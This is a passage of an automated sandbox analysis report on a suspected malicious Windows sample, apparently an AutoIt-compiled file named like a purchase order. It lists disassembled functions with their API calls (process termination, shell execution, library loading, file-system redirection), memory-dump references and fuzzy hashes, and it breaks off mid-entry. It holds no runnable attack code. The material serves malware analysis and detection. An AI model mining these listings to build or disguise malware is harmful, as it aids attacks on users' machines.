                                      • ReleaseDC.USER32(00000000,00000000), ref: 004F5238
                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004F524F
                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 004F5261
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 72c57b400c57c7ce0bec97c775aca1a4c1dc8967572d4e5512452db0ad885ec9
                                      • Instruction ID: f0478bf5621a22fccec6230e207c32c28f7dd276dc4121eef1249bedfcc9d5a2
                                      • Opcode Fuzzy Hash: 72c57b400c57c7ce0bec97c775aca1a4c1dc8967572d4e5512452db0ad885ec9
                                      • Instruction Fuzzy Hash: E801DF75E00708BBEB109BA68C49A5EBFB8EF48711F044066FB04A7282D6309805CFA0
                                      Function 00491BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00491BF4
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00491BFC
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00491C07
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00491C12
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00491C1A
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00491C22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: 99131daba3711ce609626147861a748342216f9dbdc7ffffdca0350d74d50d52
                                      • Instruction ID: 204bc34c627084af70127fda092cbef3419d7d0884ab7f68e1085e5a4e11c107
                                      • Opcode Fuzzy Hash: 99131daba3711ce609626147861a748342216f9dbdc7ffffdca0350d74d50d52
                                      • Instruction Fuzzy Hash: CF016CB09027597DE3008F5A8C85B56FFA8FF19354F00411B915C4B942C7F5A864CBE5
                                      Function 004FEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004FEB30
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004FEB46
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 004FEB55
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004FEB64
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004FEB6E
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004FEB75
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: 9b6bf9f6917de18aa44bb3f414b27300d8e18fbff8e4e0e9189998118df77fb6
                                      • Instruction ID: 4812dc5b4c361224466c14456058f51151770131dcaddb5c15db60b5778fcf1a
                                      • Opcode Fuzzy Hash: 9b6bf9f6917de18aa44bb3f414b27300d8e18fbff8e4e0e9189998118df77fb6
                                      • Instruction Fuzzy Hash: 2FF0BE72200518BBE7315B629C0EEEF3E7CEFDBB11F000158F601D1092D7A02A0AE6B5
                                      Function 004E7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?), ref: 004E7452
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 004E7469
                                      • GetWindowDC.USER32(?), ref: 004E7475
                                      • GetPixel.GDI32(00000000,?,?), ref: 004E7484
                                      • ReleaseDC.USER32(?,00000000), ref: 004E7496
                                      • GetSysColor.USER32(00000005), ref: 004E74B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                      • String ID:
                                      • API String ID: 272304278-0
                                      • Opcode ID: 99a25f407e89314b346a5ae12b8a46bd37b0c63bacda361c8255a5fa4e03074c
                                      • Instruction ID: 2399a04001d5c62123b20d2dd920ddc70831d47d098eb7c0070f7d520c068b51
                                      • Opcode Fuzzy Hash: 99a25f407e89314b346a5ae12b8a46bd37b0c63bacda361c8255a5fa4e03074c
                                      • Instruction Fuzzy Hash: B0018B31500205EFDB215F68DC08BAE7FB5FF25322F1000A5F916A21A2CB352E56FB51
                                      Function 004F1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004F187F
                                      • UnloadUserProfile.USERENV(?,?), ref: 004F188B
                                      • CloseHandle.KERNEL32(?), ref: 004F1894
                                      • CloseHandle.KERNEL32(?), ref: 004F189C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004F18A5
                                      • HeapFree.KERNEL32(00000000), ref: 004F18AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      • Opcode ID: 6a5961cd15c01eba4bf5cdcdf0d99f9b9c4ae5a1d7c90f4d0979009a733a914a
                                      • Instruction ID: b46c5903d63383dab51a2471e234b0aa4dd6d13945de49ef4ac7492632df5f71
                                      • Opcode Fuzzy Hash: 6a5961cd15c01eba4bf5cdcdf0d99f9b9c4ae5a1d7c90f4d0979009a733a914a
                                      • Instruction Fuzzy Hash: 2FE0E536004501BBDB115FA1ED0D90EBF39FF6AB22B208A24F22581076CB32943AEF50
                                      Function 0049BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 0049BEB3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID: D%V$D%V$D%V$D%VD%V
                                      • API String ID: 1385522511-527429927
                                      • Opcode ID: 0a3804329ed607d5cfadb51dabdc7683bd2d99e757668566f2aabc7bdb0ec3be
                                      • Instruction ID: b4c1cf5b4b956c345cc3dc5a235726082666fa4dd743bc89eff351c50e5ffd06
                                      • Opcode Fuzzy Hash: 0a3804329ed607d5cfadb51dabdc7683bd2d99e757668566f2aabc7bdb0ec3be
                                      • Instruction Fuzzy Hash: CF914975A0060ACFCF18CF58D2906AABBF1FF68310F24816ED945AB350D779A981DBD4
                                      Function 00517B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004B0242: EnterCriticalSection.KERNEL32(0056070C,00561884,?,?,004A198B,00562518,?,?,?,004912F9,00000000), ref: 004B024D
                                        • Part of subcall function 004B0242: LeaveCriticalSection.KERNEL32(0056070C,?,004A198B,00562518,?,?,?,004912F9,00000000), ref: 004B028A
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 004B00A3: __onexit.LIBCMT ref: 004B00A9
                                      • __Init_thread_footer.LIBCMT ref: 00517BFB
                                        • Part of subcall function 004B01F8: EnterCriticalSection.KERNEL32(0056070C,?,?,004A8747,00562514), ref: 004B0202
                                        • Part of subcall function 004B01F8: LeaveCriticalSection.KERNEL32(0056070C,?,004A8747,00562514), ref: 004B0235
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                      • String ID: +TN$5$G$Variable must be of type 'Object'.
                                      • API String ID: 535116098-2238542796
                                      • Opcode ID: cf8eb8bc5b56108617ebccb704f616bbdbf78f0c36b436c60cb05b45be0a22b1
                                      • Instruction ID: 4b1a3b400afd463175b3de779a6cc673f333d41480298fa3987e646cf155478d
                                      • Opcode Fuzzy Hash: cf8eb8bc5b56108617ebccb704f616bbdbf78f0c36b436c60cb05b45be0a22b1
                                      • Instruction Fuzzy Hash: 25918B70A0420DEFDB04EF98D8849EDBFB1BF48304F10845AF8169B292DB71AE85CB51
                                      Function 004FC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00497620: _wcslen.LIBCMT ref: 00497625
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004FC6EE
                                      • _wcslen.LIBCMT ref: 004FC735
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004FC79C
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004FC7CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info_wcslen$Default
                                      • String ID: 0
                                      • API String ID: 1227352736-4108050209
                                      • Opcode ID: 118dad8f168003a9742428937be1529765f1fcfaad80ae23c2319e2368d745e3
                                      • Instruction ID: c123d7ba9cb8e126936d39f2cfbde7ed37bd91bc886a350243a486ade9b737e7
                                      • Opcode Fuzzy Hash: 118dad8f168003a9742428937be1529765f1fcfaad80ae23c2319e2368d745e3
                                      • Instruction Fuzzy Hash: 8451E47160430D9BD714AF29CAC4A7B77E4AF55314F04092FFA91D3290DB78D804CB5A
                                      Function 0051AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0051AEA3
                                        • Part of subcall function 00497620: _wcslen.LIBCMT ref: 00497625
                                      • GetProcessId.KERNEL32(00000000), ref: 0051AF38
                                      • CloseHandle.KERNEL32(00000000), ref: 0051AF67
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                      • String ID: <$@
                                      • API String ID: 146682121-1426351568
                                      • Opcode ID: 5cccae55e9867592a581866111544e4dd9850ab377013cb5a16c4af8764ad5cd
                                      • Instruction ID: 4bc5f58f38bd3b63b109083990f418bf554353f6efba819ddbe3727dca0e2d68
                                      • Opcode Fuzzy Hash: 5cccae55e9867592a581866111544e4dd9850ab377013cb5a16c4af8764ad5cd
                                      • Instruction Fuzzy Hash: F1716775A00614DFDF11DF65C484A9EBBF4BF08318F0484AEE816AB292C778ED85CB95
                                      Function 004F719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004F7206
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004F723C
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004F724D
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004F72CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      • Opcode ID: f6d5cabd2590a285dfdec4407041de375534f3035ef2ba680f0bacdd0857908f
                                      • Instruction ID: a272117ad011cafc3b42dd5b5ebb6a753b7f7543472e554bf807d72384efb188
                                      • Opcode Fuzzy Hash: f6d5cabd2590a285dfdec4407041de375534f3035ef2ba680f0bacdd0857908f
                                      • Instruction Fuzzy Hash: B741B171604208EFDB15CF54C884AAA7FB9EF44310F1180AEFE059F24AD7B8D945CBA4
                                      Function 00522F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00522F8D
                                      • LoadLibraryW.KERNEL32(?), ref: 00522F94
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00522FA9
                                      • DestroyWindow.USER32(?), ref: 00522FB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                      • String ID: SysAnimate32
                                      • API String ID: 3529120543-1011021900
                                      • Opcode ID: a3f95c5d322f6efa49dc6cc4dba0432f454214783a2199a4a7c901de92c7f2b0
                                      • Instruction ID: 3f173db6d13ab340cb3f177e43f4eeec96fc48af3a494af3043c9145c90c1a55
                                      • Opcode Fuzzy Hash: a3f95c5d322f6efa49dc6cc4dba0432f454214783a2199a4a7c901de92c7f2b0
                                      • Instruction Fuzzy Hash: 5A219D76200215BBEB208F64ED86EBB3BB9FF5A364F100619F950D61D0D771DC51A760
                                      Function 004B4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004B4D1E,004C28E9,?,004B4CBE,004C28E9,005588B8,0000000C,004B4E15,004C28E9,00000002), ref: 004B4D8D
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004B4DA0
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,004B4D1E,004C28E9,?,004B4CBE,004C28E9,005588B8,0000000C,004B4E15,004C28E9,00000002,00000000), ref: 004B4DC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: ec1bfed4a72205a009e25dcbaf3c23ef0606cc29fb0d2ec9fa66164d475500fe
                                      • Instruction ID: 8f347b264d0af8e7959ec4e281877214666f974151836f904b67a62a2a7c0b88
                                      • Opcode Fuzzy Hash: ec1bfed4a72205a009e25dcbaf3c23ef0606cc29fb0d2ec9fa66164d475500fe
                                      • Instruction Fuzzy Hash: E9F06234A40308BBDB219F90DC49BEEBFB9EF54752F0000A9F805A62A2CB345D55DBA4
                                      Function 00494E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00494EDD,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E9C
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00494EAE
                                      • FreeLibrary.KERNEL32(00000000,?,?,00494EDD,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494EC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 145871493-3689287502
                                      • Opcode ID: b2a1570af3aaa16b81f14472f8eebf1b901702787628725a8dd9099df015dea0
                                      • Instruction ID: 93e289fafa23c9992b65d311c6a7c58eadbbd938daf1dda5cfaa3c0a84aa2273
                                      • Opcode Fuzzy Hash: b2a1570af3aaa16b81f14472f8eebf1b901702787628725a8dd9099df015dea0
                                      • Instruction Fuzzy Hash: 89E08635A016225BDA311725AC19E5F6E54AFD3B637050126FC05D2342DB64CD07D0E4
                                      Function 00494E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
